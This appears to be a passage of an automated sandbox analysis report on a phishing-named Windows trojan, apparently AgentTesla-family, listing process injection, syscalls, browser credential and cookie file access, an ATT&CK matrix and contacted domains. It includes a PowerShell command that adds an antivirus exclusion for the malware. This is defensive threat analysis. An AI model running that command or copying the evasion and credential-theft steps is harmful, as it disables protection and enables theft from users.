                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019806F1 mov eax, dword ptr fs:[00000030h]5_2_019806F1
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01942619 mov eax, dword ptr fs:[00000030h]5_2_01942619
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0191260B mov eax, dword ptr fs:[00000030h]5_2_0191260B
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process token adjusted: Debug
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe; Memory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe"
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe; NtResumeThread: Direct from: 0x773836AC
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe; NtMapViewOfSection: Direct from: 0x77382D1C
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe; NtWriteVirtualMemory: Direct from: 0x77382E3C
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe; NtProtectVirtualMemory: Direct from: 0x77382F9C
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe; NtSetInformationThread: Direct from: 0x773763F9
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe; NtCreateMutant: Direct from: 0x773835CC
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe; NtNotifyChangeKey: Direct from: 0x77383C2C
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe; NtSetInformationProcess: Direct from: 0x77382C5C
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe; NtCreateUserProcess: Direct from: 0x7738371C
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe; NtQueryInformationProcess: Direct from: 0x77382C26
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe; NtResumeThread: Direct from: 0x77382FBC
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe; NtWriteVirtualMemory: Direct from: 0x7738490C
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe; NtOpenKeyEx: Direct from: 0x77383C9C
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe; NtReadFile: Direct from: 0x77382ADC
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe; NtAllocateVirtualMemory: Direct from: 0x77382BFC
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe; NtDelayExecution: Direct from: 0x77382DDC
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe; NtQuerySystemInformation: Direct from: 0x77382DFC
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe; NtOpenSection: Direct from: 0x77382E0C
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe; NtQueryVolumeInformationFile: Direct from: 0x77382F2C
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe; NtQuerySystemInformation: Direct from: 0x773848CC
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe; NtReadVirtualMemory: Direct from: 0x77382E8C
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe; NtCreateKey: Direct from: 0x77382C6C
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe; NtClose: Direct from: 0x77382B6C
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe; NtAllocateVirtualMemory: Direct from: 0x773848EC
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe; NtQueryAttributesFile: Direct from: 0x77382E6C
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe; NtSetInformationThread: Direct from: 0x77382B4C
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe; NtTerminateThread: Direct from: 0x77382FCC
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe; NtQueryInformationToken: Direct from: 0x77382CAC
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe; NtOpenKeyEx: Direct from: 0x77382B9C
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe; NtQueryValueKey: Direct from: 0x77382BEC
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe; NtDeviceIoControlFile: Direct from: 0x77382AEC
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe; NtCreateFile: Direct from: 0x77382FEC
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe; NtOpenFile: Direct from: 0x77382DCC
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe; NtProtectVirtualMemory: Direct from: 0x77377B2E
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe; Memory written: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe; Section loaded: NULL target: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe protection: execute and read and write
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe; Section loaded: NULL target: C:\Windows\SysWOW64\Utilman.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\Utilman.exe; Section loaded: NULL target: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe protection: read write
                      Source: C:\Windows\SysWOW64\Utilman.exe; Section loaded: NULL target: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\Utilman.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                      Source: C:\Windows\SysWOW64\Utilman.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\Utilman.exe; Thread register set: target process: 5612
                      Source: C:\Windows\SysWOW64\Utilman.exe; Thread APC queued: target process: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeProcess created: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe "C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe"Jump to behavior
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exeProcess created: C:\Windows\SysWOW64\Utilman.exe "C:\Windows\SysWOW64\Utilman.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\Utilman.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                      Source: oDhSPGbJgMIIvl.exe, 00000006.00000000.2215883797.0000000001000000.00000002.00000001.00040000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000006.00000002.4560346225.0000000001000000.00000002.00000001.00040000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000000.2367935044.00000000011B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
                      Source: oDhSPGbJgMIIvl.exe, 00000006.00000000.2215883797.0000000001000000.00000002.00000001.00040000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000006.00000002.4560346225.0000000001000000.00000002.00000001.00040000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000000.2367935044.00000000011B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: oDhSPGbJgMIIvl.exe, 00000006.00000000.2215883797.0000000001000000.00000002.00000001.00040000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000006.00000002.4560346225.0000000001000000.00000002.00000001.00040000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000000.2367935044.00000000011B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                      Source: oDhSPGbJgMIIvl.exe, 00000006.00000000.2215883797.0000000001000000.00000002.00000001.00040000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000006.00000002.4560346225.0000000001000000.00000002.00000001.00040000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000000.2367935044.00000000011B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information

Source: C:\Windows\SysWOW64\Utilman.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\Utilman.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\Utilman.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\Utilman.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\Utilman.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\Utilman.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\Utilman.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\Utilman.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\Utilman.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                      Remote Access Functionality

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 412 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 11 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 412 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 113 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 22 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
[Behavior graph] ID: 1585942, Sample: ORDER REF 47896798 PSMCO.exe, Startdate: 08/01/2025, Architecture: WINDOWS, Score: 100

Source | Detection | Scanner | Label | Link
ORDER REF 47896798 PSMCO.exe | 49% | Virustotal | | Browse
ORDER REF 47896798 PSMCO.exe | 53% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla |
ORDER REF 47896798 PSMCO.exe | 100% | Avira | HEUR/AGEN.1309493 |
ORDER REF 47896798 PSMCO.exe | 100% | Joe Sandbox ML | |
                      No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
Name | Malicious | Antivirus Detection | Reputation
Name | Source | Malicious | Antivirus Detection | Reputation
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://www.beian.gov.cn/portal/registerSystemInfo?recordcode=322965365273Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                              high
                                                                              http://www.lihuazhibo.netUtilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://www.naixizhibo.comfirefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://www.designclass.netUtilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameORDER REF 47896798 PSMCO.exe, 00000000.00000002.2121105740.00000000030F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://www.easygram.netUtilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://www.69meinvzhibo.netUtilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://www.yanyuzhibo.comUtilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://www.yingzhuzhibo.netUtilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://www.2023kuanmeiyingzhibo.comUtilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://www.bachazhibo.netUtilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://www.aihuzhibo.net/template/news/wandoujia/static/js/common.fe363a40.jsUtilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://parking.reg.ru/script/get_domain_data?domain_name=www.mosorehlable.online&rand=Utilman.exe, 00000007.00000002.4563507919.00000000066B2000.00000004.10000000.00040000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.00000000039C2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://www.reg.ru/hosting/?utm_source=www.mosorehlable.online&utm_medium=parking&utm_campaign=s_lanUtilman.exe, 00000007.00000002.4563507919.00000000066B2000.00000004.10000000.00040000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.00000000039C2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://www.aihuzhibo.net/template/news/wandoujia/static/picture/qr-5_httpswww.wandoujia.comqr.pngfirefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://www.aihuzhibo.net/template/news/wandoujia/static/js/aggregatedentry.fe363a40.jsUtilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://www.minizhibo.comUtilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://www.parentwise.netUtilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://www.salmagundi.netUtilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://www.yujiezhibo.comUtilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Utilman.exe, 00000007.00000003.2488878938.00000000083C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://www.forsyte.netUtilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    http://www.qinglaizhibo.netUtilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
